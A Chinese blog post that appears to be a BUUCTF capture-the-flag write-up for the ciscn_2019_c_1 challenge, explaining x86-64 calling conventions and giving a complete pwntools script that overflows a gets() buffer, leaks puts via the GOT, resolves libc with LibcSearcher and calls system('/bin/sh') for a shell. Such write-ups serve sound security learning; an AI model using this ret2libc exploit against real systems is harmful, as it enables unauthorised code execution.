buuctf pwn10

已于 2023-11-16 10:06:13 修改
阅读量46 收藏
点赞数
文章标签: 网络
于 2023-11-02 19:49:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74861133/article/details/134062051
版权

ciscn_2019_c_1 1

1.checksec

在这里插入图片描述
Stack:No canary found表示可以通过栈溢出来进行攻击

2.ida

在这里插入图片描述
shift+f12后没有找到后门函数
考虑利用构造libc链
该图转载至’半步行止‘
该图转载至’半步行止‘

32位和64位程序在函数调用的方式存在区别。
32位程序默认调用函数的方式为先将参数压入栈中,靠近call指令的是第一个参数,而64位程序默认调用函数参数的方式则不同

  • rdi中存放第1个参数
  • rsi中存放第2个参数
  • rdx中存放第3个参数
  • rcx中存放第4个参数
  • r8中存放第5个参数
  • r9中存放第6个参数
  • 如果还有更多的参数,再把过多的那几个参数像32位程序那样压入栈中
  • 然后call

从ida中可查看逻辑为先puts()再输入一个数v4,当输入的数v4为1时执行encrypt(),然后puts(),再
gets(s)
在这里插入图片描述
在该函数中存在puts()与gets(),gets(s)中s的大小为50个字节,可利用此来进行攻击

在这里插入图片描述
在kali中使用命令查看该文件中pop rdi 和ret的指令的地址
ROPgadget --binary pwn10 --only ‘pop|ret’
exp如下:

from pwn import*
from LibcSearcher import*
p=remote('node4.buuoj.cn',26671)
pop_rdi=0x0400c83
ret=0x04006b9
elf=ELF('./pwn10')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr=elf.symbols['main']

p.sendlineafter("Input your choice!",'1')

payload=b'a'*0x58+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendlineafter('encrypted',payload)

p.recvuntil("Ciphertext\n")
p.recvuntil("\n")

puts_addr=u64(p.recv(6).strip().ljust(8,b'\x00'))
libc=LibcSearcher('puts',puts_addr)
libcbase=puts_addr-libc.dump('puts')
sys_addr=libcbase+libc.dump('system')
str_bin_sh=libcbase+libc.dump('str_bin_sh')
payload2=b'a'*0x58+p64(ret)+p64(pop_rdi)+p64(str_bin_sh)+p64(sys_addr)+p64(main_addr)


p.sendlineafter("Input your choice!",'1')
p.sendlineafter('encrypted',payload2)
p.interactive()

在这里插入图片描述
到这要选一个数,可以一个一个试

在这里插入图片描述
最后cat flag

曾经满眼皆是她
关注
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2640
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2144
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
buuctf pwn解题
2301_80477504的博客
02-01 562
1.
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 5321
BUU CTF PWN 入门知识详解
BUUCTF PWN(2)
qq_60794823的博客
09-28 256
首先先用checksec查看开启了什么保护可以看到只开启了NX保护,即堆栈不可执行用32位的IDA打开附件,shift+f12查看字串打开main函数查看vuln函数,发现存在栈溢出漏洞的函数,**fgets(s, 32, edata)**这里对gets作出了限制,32(0x20)而s的大小0x3c>0x20所以不能造成溢出。这道题就不能解决了吗,结果肯定不是这样的仔细查看C代码可以发现,函数实现了字符串替换,将I替换为you,并将结果重组赋值给s。
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1339
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
BUUCTF pwn
L0g1c的博客
01-30 1717
第一道: 第一步:连接nc靶场 第二步:连接靶场后,执行 ls 命令,展示该靶场下目录文件。 第三步:里有个 flag文件 使用 cat命令进行查看。 得到flag
buuctf pwn1_sctf_20161
m0_74125780的博客
08-26 142
然后又发现有个fgets函数,但是它限制只有32个字节,双击s查看s的长度,0x3c,有60个字符长度,但是只能输入32个字符所以无法造成栈溢出。但观察函数的内容,并nc一下,发现I可以替换成you。所以输入20个I就刚好满足60长度,再加上4。首先用checksec检查,发现是32位的,所以用32位的ida打开。速度找到system函数,查看它的地址,记下来,0x8048F0D。最后编写脚本,运行得到flag。
buuctf pwn入门1
weixin_63231007的博客
07-07 1470
buuctf pwn 前几道简单栈溢出&格式化字符串漏洞
BUUCTF PWN(1)
qq_60794823的博客
09-27 1056
首先checksec起手发现没有打开任何防护,是64位amd文件,使用IDA反汇编瞅一瞅首先shift+f12查看字串发现/bin/sh和system跟进查看/bin/sh的返回地址查看main函数的反编译代码发现**gets(s, argv)**栈溢出漏洞,没有限制s的输入大小点开s查看s的内存大小发现距离返回地址为0XF+0X8构造payload:‘a’ * 0x23 + p64(0x401186)发现连接超时。
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF pwn rip
weixin_55190422的博客
11-03 367
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
第六章传输层协议、ACL
2401_86349554的博客
11-05 845
第六章传输层协议、ACL
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
11-05 1135
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
防火墙|WAF|漏洞|网络安全
最新发布
qq_43777616的博客
11-06 769
防火墙|WAF|漏洞|网络安全
ICT网络赛道安全考点知识总结4
m0_72765822的博客
11-04 753
RADIUS和HWTACACS协议通常都使用共享密钥对传输的用户信息进行加密,以确保安全传输。 用来封装EAP报文的RADIUS属性通常是"EAP-Message",它用于传输EAP认证过程中的消息。 LDAP的域名属性通常是"DC"(Domain Component),用于表示域名的组成部分。 BFD(Bidirectional Forwarding Detection)可以用于检测网络设备之间直连物理链路的双向转发路径的故障,但也可以用于检测其他类型的链路故障。 管理员为虚拟系统手工分配资源时,
Linux:网络协议socket
Au_ust的博客
11-05 1147
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
ENSP 基于全局地址池的DHCP服务
m0_61367139的博客
11-04 447
DHCP采用C/S模式,一个是服务器端,另一个是客户端。
软设师知识点-计算机网络
loop_nervous的博客
11-04 1114
在一台安装好TCP/IP协议的计算机上,当网络连接不可用时,为了测试编写好的网络程序,通常使用的目的主机IP地址127.0.0.1(本地回送地址)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值